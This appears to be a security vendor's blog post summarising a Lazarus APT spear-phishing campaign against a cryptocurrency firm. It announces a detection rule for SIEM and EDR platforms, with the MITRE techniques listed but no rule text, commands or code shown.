The Lazarus APT group is one of the few state-sponsored cyber espionage units that also handle financially motivated cybercrimes and it is the most profitable threat actor in the cryptocurrency scene which managed to steal about $2 billion. In 2017 alone, the group stole more than half a billion dollars in cryptocurrency, so their interest in traders and exchanges is not weakening, and they recently launched another attack on a cryptocurrency organization. 

This time, Lazarus APT took advantage of an already proven trick and carried out a spear-phishing campaign with a fake LinkedIn job advert aimed at a system administrator in a targeted cryptocurrency organization. The victim received the malicious document with a macro which creates a .LNK file to call out a link via execution of mshta.exe. Then the script sends operational information to a C&C server and receives a PowerShell script that can fetch payloads used by Lazarus APT in this campaign. 

Emir Erdogan developed the exclusive rule that enables detection of TTPs  leveraged by Lazarus Group during this attack:


The rule has translations for the following platforms:

SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, LogPoint, Humio

EDR: Carbon Black, Elastic Endpoint



Tactics: Execution, Defense Evasion

Techniques: Command-Line Interface (T1059), Indicator Removal on Host (T1070), Modify Registry (T1112)


Ready to try out SOC Prime TDM? Sign up for free. Or join Threat Bounty Program to craft your own content and share it with the TDM community.

Was this article helpful?

Like and share it with your peers.
Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Related Posts